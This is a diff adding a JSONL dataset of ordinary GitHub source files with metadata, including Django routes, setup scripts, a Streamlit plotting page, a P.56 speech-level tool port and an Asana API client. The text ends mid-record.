diff --git "a/1226.jsonl" "b/1226.jsonl" new file mode 100644--- /dev/null +++ "b/1226.jsonl" @@ -0,0 +1,230 @@ +{"seq_id": "30452862837", "text": "import base64\nimport json\n\n\nbrushes = dict(\n round_bitmap_brush = [\"round_brush_16.png\", ],\n poke_brush = [\"pokebrush.png\", ],\n painterly_brush = [\"RGBA anim 01.png\", \"RGBA anim 02.png\", \"RGBA anim 03.png\", \"RGBA anim 04.png\"],\n)\n\nbrushes_as_strings = {}\nfor key, value in brushes.items():\n images = []\n for image_name in value:\n with open(image_name, \"rb\") as image_file:\n prefix = f'data:image/png;base64,'\n data = base64.b64encode(image_file.read()).decode('utf-8')\n brushes_as_strings[image_name] = prefix + data\n\njson_object = json.dumps(brushes_as_strings, indent=4)\n\nwith open('base_64_brushes', 'w', encoding='utf-8') as file:\n file.write('brush_textures = ' + json_object)\n", "repo_name": "pokepetter/taptapir_projects", "sub_path": "otosopp/assets/brush_generator.py", "file_name": "brush_generator.py", "file_ext": "py", "file_size_in_byte": 740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "base64.b64encode", "line_number": 17, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "30600901662", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n path('trails/', views.TrailList.as_view(), name='index'),\n path('trails/mytrails', views.my_trails, name=\"my_trails\"),\n path('trails//', views.trails_detail, name='detail'),\n path('trails/create/', views.TrailCreate.as_view(), name='trails_create'),\n path('trails//update/', views.TrailUpdate.as_view(), name='trails_update'),\n path('trails//delete/', views.TrailDelete.as_view(), name='trails_delete'),\n path('trails//add_comment/', views.add_comment, name='add_comment'),\n path('comments//update/', views.CommentUpdate.as_view(), name='comments_update'),\n path('trails//delete_comment//', views.delete_comment, name='comments_delete'),\n path('search/amenities', views.AmenitiesSearchResults.as_view(), name='amenities_search_results'),\n path('search/trails', views.TrailsSearchResults.as_view(), name='trails_search_results'),\n path('accounts/signup/', views.signup, name='signup'),\n\n]", "repo_name": "awojdyla89/Happy-Trails", "sub_path": "main_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, 
{"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "28440613664", "text": "from setuptools import setup, find_packages\nfrom pathlib import Path\n\nNAME = 'oxtree'\nDESCRIPTION = 'A Handy Script to view Directory Tree Structure'\nTAG = ['tree', 'folder']\nREQUIREMENT = ['oxflags']\n\nVERSION = '0.0.1'\nLONG_DESCRIPTION = (Path(__file__).parent / \"README.md\").read_text()\n\nsetup(\n name=NAME,\n version=VERSION,\n author=\"0x68616469\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n\t\tlong_description=LONG_DESCRIPTION, \n\t\tpackages=find_packages(),\n install_requires=REQUIREMENT,\n keywords=TAG,\n entry_points = {'console_scripts': ['oxtree = oxtree:main']},\n classifiers=[\n\t \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)", "repo_name": "0x68616469/oxtree", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "43625182208", "text": "import setuptools\nimport os\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='snapper-ml',\n version=os.environ.get('PROJECT_VERSION', '0.1.0'),\n author=\"Antonio Molner Domenech\",\n author_email=\"antonio.molner@correo.ugr.es\",\n description=\"A framework for reproducible machine learning\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/SnapperML/SnapperML\",\n packages=setuptools.find_packages(),\n entry_points={\n 'console_scripts': ['snapper-ml=snapper_ml.scripts.run_experiment:app'],\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n install_requires=[\n 'docker>=4.1.0',\n 'EasyProcess>=0.2.10',\n 'mlflow>=1.11.0',\n 'gorilla>=0.3.0',\n 'optuna>=1.1.0',\n 'docstring-parser>=0.6',\n 'pydantic>=1.4',\n 'python-dotenv>=0.10.3',\n 'ray>=0.8.2',\n 'PyYAML>=5.1.2',\n 'pytictoc>=1.5.0',\n 'coloredlogs>=10.0',\n 'py-cpuinfo>=5.0.0',\n 'typer>=0.1.1',\n 'pystache',\n 'shellingham',\n 'colorama',\n 'numpy'\n ],\n dependency_links=['https://github.com/SnapperML/knockknock.git@master#egg=knockknock']\n)\n", "repo_name": "SnapperML/SnapperML", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1414, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "86", "api": [{"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "17899149261", "text": "import logging\n\n# Build and config the logger\nlogging.basicConfig(filename = 
\"main.log\",\n format = \"%(asctime)s %(message)s\",\n filemode = \"w\")\n\n# set an object for the logger\nnew_logger = logging.getLogger()\n\n# set threshold to debug\nnew_logger.setLevel(logging.DEBUG)\n\n# Test Messages for that log\nnew_logger.debug(\"This is a Harmless debug message\")\nnew_logger.info(\"Information message\")\nnew_logger.warning(\"A warning message\")\nnew_logger.error(\"This is an error message\")\nnew_logger.critical(\"No Internet, Internet is down now\")", "repo_name": "LucianPopaLVP/practice-projects", "sub_path": "basics/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.basicConfig", "line_number": 4, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 12, "usage_type": "attribute"}]} +{"seq_id": "11845188703", "text": "import pandas as pd\nfrom abstra.dashes import redirect, get_user\n\ncsv_data = 'credit_analysis_data.csv'\ndf = pd.read_csv(csv_data)\n\n# convert columns created_at and updated_at to formated date as sstring\ndf['created_at'] = pd.to_datetime(df['created_at'], unit='s').dt.strftime('%Y/%m/%d %H:%M:%S')\ndf['updated_at'] = pd.to_datetime(df['updated_at'], unit='s').dt.strftime('%Y/%m/%d %H:%M:%S')\n\n\ndef handle_table_action(event):\n payload = event.get('payload')\n action = payload.get('action')\n\n if action != 'Edit':\n return\n\n data = payload.get('data')\n \n redirect('/credit_request', {\"id\": data.get('request_id')})", "repo_name": "abstra-app/dashes-examples", "sub_path": "credit-request-admin/credit_requests.py", "file_name": "credit_requests.py", "file_ext": "py", "file_size_in_byte": 623, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 9, "usage_type": "call"}, {"api_name": "abstra.dashes.redirect", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "1529581975", "text": "from pathlib import Path\nimport argparse\n\ndef evaluate_ctm(ref_ctm, hyp_ctm, word):\n\n print(word)\n\n # setting paths\n ref_ctm_path = Path(ref_ctm)\n hyp_ctm_path = Path(hyp_ctm)\n\n # read ctm files\n ref_ctm = [x.split() for x in open(ref_ctm_path, 'r', encoding='utf-8').read().split('\\n') if x]\n ref_ctm = [{'segment_id': s[0], 'channel': s[1], 'start': float(s[2]), 'duration': float(s[3]), 'word': s[4].lower()}\n for s in ref_ctm if s[4].lower() == word.lower()]\n\n hyp_ctm = [x.split() for x in open(hyp_ctm_path, 'r', encoding='utf-8').read().split('\\n') if x]\n hyp_ctm = [{'segment_id': s[0], 'channel': s[1], 'start': float(s[2]), 'duration': float(s[3]), 'word': s[4].lower()}\n for s in hyp_ctm if s[4].lower() == word.lower()]\n\n tp = 0\n fp = 0\n fn = 0\n\n for ref_w in ref_ctm:\n w_found = False\n for hyp_w in hyp_ctm:\n if ref_w['segment_id'] == hyp_w['segment_id']:\n if abs(hyp_w['start'] - ref_w['start']) < hyp_w['duration']:\n tp += 1\n w_found = True\n if not w_found:\n fn += 1\n\n for hyp_w in hyp_ctm:\n w_found = False\n for ref_w in ref_ctm:\n if ref_w['segment_id'] == hyp_w['segment_id']:\n if abs(hyp_w['start'] - ref_w['start']) < hyp_w['duration']:\n w_found = True\n if not w_found:\n fp += 1\n\n\n 
print(f'TP {tp}\\n')\n print(f'FP {fp}\\n')\n print(f'FN {fn}\\n')\n\n\nif __name__ == '__main__':\n # argument parser\n parser = argparse.ArgumentParser()\n parser.add_argument('-ref', '--ref_ctm_path', required=True, type=Path,\n help='Path to ref ctm file')\n parser.add_argument('-hyp', '--hyp_ctm_path', required=True, type=Path,\n help='Path to hyp ctm file')\n parser.add_argument('-hw', '--hot_word', required=True, type=str,\n help='Hot word to be detected')\n\n # parse\n script_args = parser.parse_args()\n\n evaluate_ctm(script_args.ref_ctm_path, script_args.hyp_ctm_path, script_args.hot_word)\n", "repo_name": "kosti4ka/ukroASR", "sub_path": "kws_evaluation.py", "file_name": "kws_evaluation.py", "file_ext": "py", "file_size_in_byte": 2142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pathlib.Path", "line_number": 9, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 52, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 53, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "11678852444", "text": "import streamlit as st\nimport pandas as pd\nimport os\nimport matplotlib\nmatplotlib.use('Agg')\nimport seaborn as sns\n\ndef app():\n if 'main_data.csv' not in os.listdir('data'):\n st.markdown(\"Please upload data through `Upload Data` page!\")\n \n else:\n df = pd.read_csv('data/main_data.csv')\n\n # Plot and Visualization\n\n st.subheader(\"Data Visualization\")\n # Correlation\n\t # Seaborn Plot\n if st.checkbox(\"Correlation Plot[Seaborn]\"):\n st.write(sns.heatmap(df.corr(),annot=True))\n st.pyplot()\n \n # Pie Chart\n if st.checkbox(\"Pie Plot\"):\n all_columns_names = df.columns.tolist()\n if st.button(\"Generate Pie Plot\"):\n st.success(\"Generating A Pie Plot\")\n st.write(df.iloc[:,-1].value_counts().plot.pie(autopct=\"%1.1f%%\"))\n st.pyplot()\n\n # Count Plot\n if st.checkbox(\"Plot of Value Counts\"):\n st.text(\"Value Counts By Target\")\n all_columns_names = df.columns.tolist()\n primary_col = st.selectbox(\"Primary Columm to GroupBy\",all_columns_names)\n selected_columns_names = st.multiselect(\"Select Columns\",all_columns_names)\n if st.button(\"Plot\"):\n st.text(\"Generate Plot\")\n if selected_columns_names:\n vc_plot = df.groupby(primary_col)[selected_columns_names].count()\n else:\n vc_plot = df.iloc[:,-1].value_counts()\n st.write(vc_plot.plot(kind=\"bar\"))\n st.pyplot()\n\n", "repo_name": "anubhav0809/Data_Explorer", "sub_path": "pages/plot_vis.py", "file_name": "plot_vis.py", "file_ext": "py", "file_size_in_byte": 1596, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "matplotlib.use", "line_number": 5, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 9, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 17, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 21, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 21, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 22, "usage_type": "call"}, {"api_name": 
"streamlit.checkbox", "line_number": 25, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 28, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 30, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 36, "usage_type": "call"}, {"api_name": "streamlit.multiselect", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 38, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 39, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 44, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "2470656953", "text": "'''\nLendo, escrevendo e apagando arquivos no Python\n'''\n\n## CRIANDO ARQUIVO\n\n# file = open('abc.txt', 'w+')\n# file.write('Linha 1\\n')\n# file.write('Linha 2\\n')\n# file.write('Linha 3\\n')\n# file.write('Linha 4\\n')\n#\n# file.seek(0,0) ## buscando a posição no arquivo (onde o cursor estar) voltar ao topo do arquivo\n# print('Lendo linhas: ')\n# print(file.read())\n# print('################################')\n#\n# file.seek(0,0)\n# print(file.readline())\n# print(file.readline())\n# print(file.readline())\n#\n# print('################################')\n# file.seek(0,0)\n# for linha in file.readlines():\n# print(linha, end='')\n#\n# print('################################')\n# file.seek(0,0)\n# for linha in file:\n# print(linha)\n#\n# file.close()\n\n## utilizando a maneira de contexto eu não preciso fechar o arquivo\n#\n# with open('abc.txt','w+') as file:\n# file.write('Linha 1\\n')\n# file.write('Linha 2\\n')\n# file.write('Linha 3\\n')\n#\n# file.seek(0)\n# print(file.read())\n\n\n## utilizando o r+ para ler os arquivos\n\n# with open('abc.txt', 'r+') as file:\n# print(file.read())\n\n## utilizando o a+: ele ativa o append mode (adiciona coisas ao arquivo)\n\n# with open('abc.txt', 'a+') as file:\n# file.write('Outra linha\\n')\n# file.seek(0)\n# print(file.read())\n\n## apagando arquivo\n\n# import os\n# os.remove('abc.txt')\n\n## lendo json\n\nimport json\n\nd1 = {\n 'Pessoa 1' : {\n 'nome': 'Luiz',\n 'idade' : 25,\n },\n 'Pessoa 2' : {\n 'nome' : 'Luisa',\n 'idade': 30,\n },\n}\n\nd1_json = json.dumps(d1, indent=True)\nwith open('abc.json', 'w+') as file:\n file.write(d1_json)\n", "repo_name": "JoyDantas/cursopython", "sub_path": "modulo_02/aula18.py", "file_name": "aula18.py", "file_ext": "py", "file_size_in_byte": 1624, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dumps", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "33994524906", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#/* v3.5 02.Feb.10\n# ============================================================================\n#\n# SV56DEMO.C\n# ~~~~~~~~~~\n#\n# Description:\n# ~~~~~~~~~~~~\n#\n# Example program that calculates the factor for equalizing, and\n# equalizes, a file's active speech level \"NdB\" dBs below a 0 dB\n# reference. 
Here, the default reference is 0 dB below system overload.\n# This program, as an option, may normalize the output file using the \n# measure RMS (long term) level, instead of the active speech level.\n#\n# The calculation of speech file's active power uses the algorithm\n# in ITU-T Recommendation P.56, and as a by-product of\n# this mudule, also calculates the activity [%], RMS power,\n# positive and negative peaks for the file, and peak factors.\n#\n# In general, input and output files are in integer represent-\n# ation, 16-bit words, 2's complement. In UGST convention, this\n# data must be left-adjusted, RATHER than right-adjusted. Since\n# the speech voltmeter uses `float' input data, it is necessary to\n# convert from short (in the mentioned format) to float; this is\n# carried out by the function `sh2fl()'. This function has the\n# option of `normalize' the input data to the range -1..+1, what\n# is done. After the equalization factor is found, the function\n# `scale()' is called to carry out the equalization using single\n# (rather than double) float precision. After equalized, data need\n# to be converted back to integer (short, right-justified). This\n# is done by function `fl2sh()', using: truncation, no\n# zero-padding of the least significant bits, left-justification\n# of data, hard-clipping of data outside the range -32768..+32767.\n# After that, data is saved to file.\n#\n# The default values for the AD,DA systems resolution is 16\n# bits, for the sampling rate is 16000 Hz. To change this\n# on-line, just specify the parameters 6 and/or 7 conveniently\n# in the command line. For example, 14 bits and 8000 Hz:\n# $ sv56demo filein fileout 256 1 100 -15 8000 14 \n#\n# Usage:\n# ~~~~~~\n# $ sv56demo [-options] FileIn FileOut \n# [BlockSize [1stBlock [NoOfBlocks [DesiredLevel\n# [SampleRate [Resolution] ] ] ] ] ]\n# where:\n# FileIn is the input file to be analysed and equalized;\n# FileOut is the output equalized file\n# BlockSize is the block size in number of samples;\n# 1stBlock the first block to be analysed/equalized\n# NoOfBlocks number of blocks to be analysed/equalized\n# DesiredLevel level desired to the output file, in dBov or dBm0\n# SampleRate sampling rate used for acquiring/generating the\n# file, in Hertz; default is 16000 Hz; THIS PARAMETER\n# IS OPTIONAL!\n# Resolution the digital system resolution (AD,DA systems), in\n# number of bits; default to 16 bits; THIS PARAMETER\n# IS OPTIONAL, but to specify it you need to specify\n# the former one!\n# Options:\n# ~~~~~~~~\n# -bits n ........ change the default word length to n bits; equivalent\n# to parameter Resolution above [default: 16 bits]\n# -lev ndB ....... equivalent to specifying DesiredLevel above, just that\n# here do not need to specify the former 3 parameters.\n# -log file ...... print the statistics log into file rather than stdout\n# -q ............. quit operation - does not print the progress flag. \n# Saves time and avoids trash in batch processings.\n# -qq ............ print short statistics summary; no progress flag.\n# -rms ........... normalizes the output file using the RMS long-term level, \n# instead of the active speech level.\n# -sf f .......... set sampling frequency to `f' Hz; equivalent to parameter \n# SampleRate above.\n# -blk len ...... is the block size in number of samples;\n# this parameter is optional, and the default is block size\n#\t of 256 samples; equivalent to parameter N above\n# -start sb ...... 
define `sb' as the first block to be measured; equivalent \n# to parameter N1 above [default: first block of the file] \n# -end eb ........ define `eb' as the last block to be measured\n# -n nb .......... define `nb' as the number of blocks to be measured; \n# equivalent to parameter N2 above [default: whole file]\n#\n# Modules used:\n# ~~~~~~~~~~~~~\n# > sv-P56.c: contains the functions related to active speech\n# level measurement according to P.56,\n# init_speech_voltmeter(), speech_voltmeter() and \n# bin_interp(). Their prototypesare in `sv-p56.h'.\n# > ugst-utl.c: utility functions; here are used the gain/loss\n# (scaling) algorithm of scale() and the data type\n# conversion functions sh2fl() and fl2sh(). Prototypes \n# are in `ugst-utl.h'.\n#\n# Exit values:\n# ~~~~~~~~~~~~\n# 0 success (all but VMS);\n# 1 success (only in VMS);\n# 2 error opening input file;\n# 3 error creating output file;\n# 4 error moving pointer to desired start of conversion;\n# 5 error reading input file;\n# 6 error writing to file;\n#\n# Compilation:\n# ~~~~~~~~~~~~\n# VaxC: cc sv56demo.c \n# link sv56demo\n# TurboC: tcc sv56demo.c\n# Sun-OS: cc -o sv56demo sv56demo.c -lm \n#\n# Author: \n# ~~~~~~~ \n# Simao Ferraz de Campos Neto\n# DDS/Pr11 Tel: +55-192-39-1396 \n# CPqD/Telebras Fax: +55-192-53-4754 \n# 13085-061 Campinas SP Brazil E-mail: \n#\n# Log of changes:\n# ~~~~~~~~~~~~~~~\n# 09.Mar.90 0.0 Release of first version of a C speech\n# voltmeter.\n# 08.Oct.91 1.0 Release of demo program for the speech\n# voltmeter module.\n# 19.Feb.92 2.0 Call to module using state variable instead of\n# individual variables. Compilation option \n# between dB(overload) and dBm0.\n# 18.May.92 2.1 Removed references to dBm0; input data\n# is converted to the normalized range; \n# speech voltmeter needs input data in\n# normalized range. \n# 10.Dec.94 3.0 Included additional input interface. NdB promoted\n# from long to double. \n# 21.Aug.95 3.1 Included additional option to normalize output\n# file using RMS long-term level instead of active \n# level, and options for block size, first block, \n# last block, number of blocks. \n# 29.May.97 3.2 moved summary statistics code to a function, and\n# created a short summary function as well. Added\n# command-line option to print short summary\n# (-qq). Add -log option so save statistical\n# summaries into a file \n# 06.Apr.98 3.3 solved small bug that occurred when the file \n# size was not a multiple of the frame\n# size. The program was truncating the output\n# file size to a multiple of the current\n# block size. The fix was to introduce a\n# ceil() in the calculation of N2 when N2==0\n# \n# 08.Jul.99 3.4 fixed a bug in fwrite() call in main(); was \n# saving N samples, rather than \"l\". 
This was\n# causing more samples to be written to the\n# end of the file when the file size was not\n# a multiple of the block size .\n# 02.Feb.10 3.5 Modified maximum string length to avoid\n# buffer overruns (y.hiwasaki)\n#\n# ============================================================================\n#*/\n\nimport os\nimport math\nimport argparse\nfrom ctypes import sizeof, c_short\n\nimport numpy as np\n\nfrom svp56 import SVP56_state, bin_interp, init_speech_voltmeter, speech_voltmeter\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(prog='sv56demo', add_help=True)\n parser.add_argument('FileIn', help='the input file to be analysed and equalized')\n parser.add_argument('FileOut', help='the output equalized file')\n \n args = parser.parse_args()\n\n # Parameters for operation \n N=256\n N1=0\n N2=0\n NdB=-26 # dBov\n\n # Intermediate storage variables for speech voltmeter\n state = SVP56_state()\n\n # Other variables\n quiet=0\n use_active_level = 1\n long_summary = 1\n NrSat = 0\n start_byte = 0\n bitno = 16\n sf = 16000\n factor = 0.0\n ActiveLeveldB = None\n DesiredSpeechLeveldB = None\n\n # ......... SOME INITIALIZATIONS .........\n start_byte = N1\n start_byte *= N * sizeof(c_short)\n\n # Check if is to process the whole file\n if N2 == 0:\n st = os.stat(args.FileIn)\n N2 = math.ceil((st.st_size - start_byte) / (N * sizeof(c_short)))\n \n # Overflow (saturation) point\n Overflow = math.pow(2.0, (bitno-1))\n\n init_speech_voltmeter(state, sf)\n print(state)\n # Opening input file\n Fi = None\n with open(args.FileIn, 'rb') as fid:\n Fi = np.fromfile(fid, dtype=np.int16)\n Fi = Fi.astype(np.float32) / np.iinfo(np.int16).max\n\n index = 0\n for i in range(0, N2):\n index = i * N\n\n ActiveLeveldB = speech_voltmeter(Fi[index:min(index+N, len(Fi))], state)\n\n # ... COMPUTE EQUALIZATION FACTOR ... 
\n DesiredSpeechLeveldB = float( NdB )\n if use_active_level:\n factor = math.pow(10.0, (DesiredSpeechLeveldB-ActiveLeveldB) / 20.0)\n else:\n factor = math.pow(10.0, (DesiredSpeechLeveldB-SVP56_get_rms_dB(state)) / 20.0)\n\n #\n # EQUALIZATION: hard clipping (with truncation)\n #\n\n # Get data of interest, equalize and de-normalize\n Fo = Fi * factor\n Fo = (Fo * np.iinfo(np.int16).max).astype(np.int16)\n with open(args.FileOut, 'wb') as fid:\n Fo.tofile(fid)\n\n", "repo_name": "odorumaharaja/svp56", "sub_path": "sv56demo.py", "file_name": "sv56demo.py", "file_ext": "py", "file_size_in_byte": 10452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 176, "usage_type": "call"}, {"api_name": "svp56.SVP56_state", "line_number": 189, "usage_type": "call"}, {"api_name": "ctypes.sizeof", "line_number": 205, "usage_type": "call"}, {"api_name": "ctypes.c_short", "line_number": 205, "usage_type": "argument"}, {"api_name": "os.stat", "line_number": 209, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 210, "usage_type": "call"}, {"api_name": "ctypes.sizeof", "line_number": 210, "usage_type": "call"}, {"api_name": "ctypes.c_short", "line_number": 210, "usage_type": "argument"}, {"api_name": "math.pow", "line_number": 213, "usage_type": "call"}, {"api_name": "svp56.init_speech_voltmeter", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 220, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 221, "usage_type": "attribute"}, {"api_name": "numpy.iinfo", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 221, "usage_type": "attribute"}, {"api_name": "svp56.speech_voltmeter", "line_number": 227, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 232, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.iinfo", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 242, "usage_type": "attribute"}]} +{"seq_id": "36949984921", "text": "import json\nimport requests as r\nimport time\n\n\ndef asana_client(method, url, **kwargs):\n backoff_seconds = 0.500\n retryError = 429\n attempt = 0\n\n base_url = \"https://app.asana.com/api/1.0\"\n full_url = base_url + url\n\n if \"data\" in kwargs:\n data = json.dumps(kwargs[\"data\"])\n else:\n data = {}\n\n if \"params\" in kwargs:\n params = kwargs[\"params\"]\n else:\n params = {}\n\n headers = {\"Authorization\": \"Bearer \" + kwargs[\"token\"]}\n\n result = False\n\n while ((retryError == 429) or (retryError == 500)) and (attempt < 10):\n # pause execution before trying again\n\n if attempt == 6:\n print(\"hitting rate limits. slowing down calls...\")\n\n if attempt == 8:\n print(\"thanks for your patience. 
still slow.\")\n\n try:\n response = r.request(\n method, url=full_url, data=data, params=params, headers=headers\n )\n retryError = response.status_code\n\n if retryError >= 400:\n if (response.status_code != 429) and (response.status_code != 500):\n error_json = response.json()\n print(error_json[\"errors\"][0][\"message\"])\n print(\"HTTP Error: \", response.status_code)\n return False\n else:\n response_content = response.json()\n return response_content\n\n except r.HTTPError as e:\n if (response.status_code != 429) and (response.status_code != 500):\n print(\"HTTP Error: \", response.status_code)\n error_json = response.json()\n print(error_json[\"errors\"][0][\"message\"])\n return False\n\n # Exponential backoff in seconds = constant * attempt^2\n retry_time = backoff_seconds * attempt * attempt\n\n print(\n f\"The script is hitting rate limits (too many calls/minute). Waiting for {retry_time} seconds before continuing\"\n )\n time.sleep(retry_time)\n attempt += 1\n\n if attempt >= 10:\n print(\"too many requests hit rate limits - timed out\")\n\n return result\n", "repo_name": "Asana-Technical-Services/Mass-Update-Teams", "sub_path": "teamupdate/asanaUtils/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 2158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dumps", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 53, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "6332496326", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"home/\", views.home, name=\"home\"),\n path(\"books/\", views.books, name=\"books\"),\n path(\"book//\", views.book, name=\"book\"),\n path('login/', views.log_in, name='login'),\n path('logout/', views.log_out, name='logout'),\n path('register/', views.register, name='register'),\n]\n\n", "repo_name": "fedarenka/mysite", "sub_path": "books/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "37650896590", "text": "from .RedisDriver import RedisDriver\nfrom datetime import datetime, timedelta\n\n\nclass ShotTimeCalculator:\n def __init__(self):\n self.shot_times = []\n self.redis = RedisDriver()\n self.days = {\n 'monday': 0,\n 'tuesday': 1,\n 'wednesday': 2,\n 'thursday': 3,\n 'friday': 4,\n 'saturday': 5,\n 'sunday': 6,\n }\n \n def calculate_shot_times(self):\n self.__get_settings_or_default()\n self.__make_nice_start_time()\n\n actual_time = datetime.now().replace(tzinfo=None).astimezone(tz=None)\n\n if actual_time.weekday() in self.shot_days:\n self.shot_times = []\n\n if self.start_time > actual_time:\n self.shot_times.append(self.start_time)\n\n time_counter = self.start_time\n\n while time_counter < self.stop_time:\n time_counter 